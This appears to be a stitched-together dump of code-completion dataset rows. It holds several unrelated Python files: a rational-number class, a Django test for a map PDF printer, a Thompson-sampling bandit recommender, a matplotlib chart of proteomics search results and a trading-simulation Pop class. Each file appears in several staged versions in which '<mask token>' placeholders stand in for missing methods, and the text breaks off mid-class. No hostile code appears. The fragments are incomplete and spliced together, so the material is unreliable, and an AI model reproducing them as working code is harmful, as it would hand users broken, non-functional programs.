'informal' string representation
"""
ret = str(self.num)
if self.den != 1:
ret += '/' + str(self.den)
return ret
#
def __bytes__(self):
"""
'bytes()' operation
"""
return bytes(str(self), 'utf8')
#
def __bool__(self):
"""
'bool()' operation
"""
return self.num != 0
#
def isinteger(self):
"""
        Does this Rational instance represent an integer?
"""
return self.den == 1
#
    @property
    def num(self):
        """
        returns numerator of Rational
        """
        return self._num
    #
    @property
    def den(self):
        """
        returns denominator of Rational
        """
        return self._den
#
@staticmethod
def parse(string):
"""
parse string to Rational
"""
posslash = string.find('/')
if posslash < 0:
return Rational(int(string), 1)
else:
strs = string.split('/')
return Rational(int(strs[0].strip()), int(strs[1].strip()))
#
ZERO = None
ONE = None
Rational.ZERO = Rational(0, 1)
Rational.ONE = Rational(1, 1)
| [
17,
30,
33,
35,
41
] |
658 | 5e0cba6952cdc677c640a0df325426ffc89189cd | <mask token>
class TestSunlumoProjectPrinter(TestCase):
<mask token>
<mask token>
| <mask token>
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
<mask token>
| <mask token>
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| from django.test import TestCase
from ..printer import Printer
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines',
'points'], 'transparencies': [50, 0, 0]})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| # -*- coding: utf-8 -*-
from django.test import TestCase
from ..printer import Printer
class TestSunlumoProjectPrinter(TestCase):
def test_printer(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
tmpFile = '/tmp/printtmp'
sl_prj.printToPdf({
'tmpFile': tmpFile, 'layout': 'test_layout',
'bbox': [-2, -2, 2, 2], 'layers': ['polygons', 'lines', 'points'],
'transparencies': [50, 0, 0]
})
with open(tmpFile + '.pdf', 'rb') as pdfFile:
            # we just want to test if the PDF file is not blank
data = pdfFile.read()
self.assertEqual(len(data), 426652)
def test_printer_missing_required_params(self):
sl_prj = Printer('./sunlumo_mapserver/test_data/test_sunlumo.qgs')
with self.assertRaises(RuntimeError):
sl_prj.printToPdf({})
| [
1,
2,
3,
4,
5
] |
659 | 49df9db508637ce5914aa6591178a03c609b6bc7 | <mask token>
class TS_RLR:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
<mask token>
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
            self.batch_articles = self.articles_1_d[self.batch_ids].T
            res = minimize(self.to_minimize, w, method='nelder-mead',
                options={'xtol': 1e-08, 'disp': False})
            self.mu = res.x
            p = 1 / (1 + np.exp(-self.mu.dot(self.batch_articles)))
            for i in np.arange(0, self.d):
                self.q[i] += sum(self.batch_articles[i] * self.
                    batch_articles[i] * p * (1 - p))
self.batch_ids = list([])
self.batch_clicks = np.array([])
<mask token>
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
<mask token>
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
            self.batch_articles = self.articles_1_d[self.batch_ids].T
            res = minimize(self.to_minimize, w, method='nelder-mead',
                options={'xtol': 1e-08, 'disp': False})
            self.mu = res.x
            p = 1 / (1 + np.exp(-self.mu.dot(self.batch_articles)))
            for i in np.arange(0, self.d):
                self.q[i] += sum(self.batch_articles[i] * self.
                    batch_articles[i] * p * (1 - p))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| <mask token>
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
def sigmoid(self, x):
return 1.0 / (1.0 + math.exp(-x))
def add_new_article(self, line):
article_id = int(line.split(' ')[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([
len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1 / 2 * sum(self.q * (w - self.mu) * (w - self.mu)) + sum(np
.log(1 + np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
            self.batch_articles = self.articles_1_d[self.batch_ids].T
            res = minimize(self.to_minimize, w, method='nelder-mead',
                options={'xtol': 1e-08, 'disp': False})
            self.mu = res.x
            p = 1 / (1 + np.exp(-self.mu.dot(self.batch_articles)))
            for i in np.arange(0, self.d):
                self.q[i] += sum(self.batch_articles[i] * self.
                    batch_articles[i] * p * (1 - p))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions,
click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1 /
self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1:
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles) - 1)
selected_article = best_value_articles[index]
return selected_article, warmup
| import numpy as np
import math
import random
from numpy.linalg import inv
from scipy.optimize import minimize
from Util import to_vector
class TS_RLR:
def __init__(self, alpha):
self.d = 6
self.k = 6
self.alpha = alpha
self.batch_size = 1000
self.training_size = 1000
self.impressions = 0
self.batch_ids = list([])
self.batch_clicks = np.array([])
self.articles_1_d = np.array([])
self.article_ids = dict()
self.bad_articles = set()
self.mu = np.zeros(self.d)
self.q = self.alpha * np.ones(self.d)
def sigmoid(self, x):
# print(x)
return 1.0 / (1.0 + math.exp(-x))
def add_new_article(self, line):
article_id = int(line.split(" ")[0])
if article_id in self.bad_articles:
return -1
if article_id not in self.article_ids:
try:
article = to_vector(line)
except IndexError:
self.bad_articles.add(article_id)
return -1
self.article_ids[article_id] = len(self.article_ids)
self.articles_1_d = np.append(self.articles_1_d, article).reshape([len(self.article_ids), self.d])
return article_id
def to_minimize(self, w):
return 1/2 * sum (self.q * (w - self.mu) * (w - self.mu)) + sum(np.log(1+np.exp(-self.batch_clicks * w.dot(self.batch_articles))))
def update(self, user, selected_article, click):
self.impressions += 1
self.batch_ids.append(self.article_ids[selected_article])
self.batch_clicks = np.append(self.batch_clicks, click)
if self.impressions % self.batch_size == 0:
w = np.random.normal(0, 1, self.d)
            self.batch_articles = self.articles_1_d[self.batch_ids].T  # (d, batch_size); transposing keeps each feature row intact
            res = minimize(self.to_minimize, w, method='nelder-mead', options={'xtol': 1e-8, 'disp': False})
            self.mu = res.x  # Laplace step: the posterior mean moves to the MAP estimate
            p = 1/(1 + np.exp(- self.mu.dot(self.batch_articles)))
for i in np.arange(0, self.d):
self.q[i] += sum(self.batch_articles[i] * self.batch_articles[i] * p[i] * (1-p[i]))
self.batch_ids = list([])
self.batch_clicks = np.array([])
def warmup(self, file):
pass
def select(self, user, pre_selected_article, lines, total_impressions, click):
selected_article = -1
warmup = False
if self.impressions < self.training_size:
for line in lines:
self.add_new_article(line)
self.update(user, pre_selected_article, click)
selected_article = pre_selected_article
warmup = True
else:
best_value = 0
best_value_articles = list()
sample_w = np.random.multivariate_normal(self.mu, np.diag(1/self.q))
for line in lines:
article_id = self.add_new_article(line)
if article_id == -1 :
continue
a_id = self.article_ids[article_id]
article = self.articles_1_d[a_id]
cur_value = self.sigmoid(sample_w.dot(article))
if cur_value > best_value:
best_value_articles = list([article_id])
best_value = cur_value
elif cur_value == best_value:
best_value_articles.append(article_id)
index = random.randint(0, len(best_value_articles)-1)
selected_article = best_value_articles[index]
return selected_article, warmup
| [
1,
6,
7,
8,
10
] |
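The TS_RLR class above implements Thompson sampling for contextual bandits on top of Bayesian logistic regression with a diagonal Laplace approximation (in the spirit of Chapelle & Li, 2011): each selection draws a weight vector from N(mu, diag(1/q)), scores every candidate article through a sigmoid, and keeps the argmax. A minimal sketch of just that draw-and-score step, assuming a fitted (mu, q) pair and d=6 article features; thompson_pick is a name introduced here for illustration:

import numpy as np

def thompson_pick(mu, q, articles):
    """Draw one weight vector from the diagonal Gaussian posterior and
    return the row index of the article with the highest predicted CTR."""
    w = np.random.multivariate_normal(mu, np.diag(1.0 / q))  # posterior sample
    scores = 1.0 / (1.0 + np.exp(-articles @ w))  # sigmoid click-rate estimates
    return int(np.argmax(scores))

# toy usage: four candidate articles with d=6 features each
candidates = np.random.rand(4, 6)
print(thompson_pick(np.zeros(6), np.ones(6), candidates))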
660 | e08159a51b611ce6d0ca354a4fe6759d00af2cb7 | <mask token>
| <mask token>
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.figure()
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| <mask token>
file_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',
'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']
file_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.figure()
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| import matplotlib.pyplot as plt
file_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',
'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']
file_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3:
proteins += 1
peptides += int(line.split('\t')[3])
protein_list.append(proteins)
peptides_list.append(peptides)
print(f'{file_name} is done')
plt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing proteins found')
plt.ylabel('Number of proteins matched')
plt.tight_layout()
plt.savefig('search_engines_proteins.png')
plt.figure()
plt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',
'cyan'], edgecolor='blue')
plt.title('Comparing amount of peptides matched')
plt.ylabel('Total amount of peptides matched')
plt.tight_layout()
plt.savefig('search_engines_peptides.png')
| import matplotlib.pyplot as plt
file_list = ["Quantification_comet_fdr.csv",
"Quantification_crux_fdr.csv",
"Quantification_msfg_fdr.csv",
"Quantification_msfg_percolator.csv"]
file_titles = ["Comet",
"Crux",
"MSGFPlus",
"MSGFPlus + Percolator"]
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0 # n of proteins
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3: # Proteins are listed after row 4
proteins += 1
peptides += int(line.split('\t')[3]) # n_peptides is in column 4
protein_list.append(proteins)
peptides_list.append(peptides)
print(f"{file_name} is done")
plt.bar(file_titles,
protein_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing proteins found")
plt.ylabel("Number of proteins matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_proteins.png")
plt.figure()  # start a fresh figure so the peptide chart does not overlay the protein bars
plt.bar(file_titles,
peptides_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing amount of peptides matched")
plt.ylabel("Total amount of peptides matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_peptides.png")
| [
0,
1,
2,
3,
4
] |
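Because pyplot draws onto the current figure by default, the two charts in this script need separate figures; otherwise the second PNG would contain the protein bars underneath the peptide bars. A hedged refactor of the same plotting logic into a reusable helper, assuming the variables defined in the script above; plot_bar_chart is a name introduced here:

import matplotlib.pyplot as plt

def plot_bar_chart(labels, values, title, ylabel, outfile):
    """Render one bar chart on its own figure and save it to disk."""
    fig, ax = plt.subplots()
    ax.bar(labels, values, color=['black', 'red', 'green', 'blue', 'cyan'],
           edgecolor='blue')
    ax.set_title(title)
    ax.set_ylabel(ylabel)
    fig.tight_layout()  # fixes cut-off labels
    fig.savefig(outfile)
    plt.close(fig)  # release the figure so later charts never overlay this one

# plot_bar_chart(file_titles, protein_list, 'Comparing proteins found',
#                'Number of proteins matched', 'search_engines_proteins.png')
# plot_bar_chart(file_titles, peptides_list, 'Comparing amount of peptides matched',
#                'Total amount of peptides matched', 'search_engines_peptides.png')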
661 | 887a39f1eeb81e6472938c2451e57866d3ac4a45 | <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
<mask token>
<mask token>
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
<mask token>
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
<mask token>
<mask token>
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
<mask token>
<mask token>
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
<mask token>
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
<mask token>
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
<mask token>
<mask token>
<mask token>
def __key__(self):
return self.id
<mask token>
<mask token>
| <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
<mask token>
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
        Find a province near home province where it's the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
<mask token>
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
<mask token>
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| <mask token>
class Pop(object):
<mask token>
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
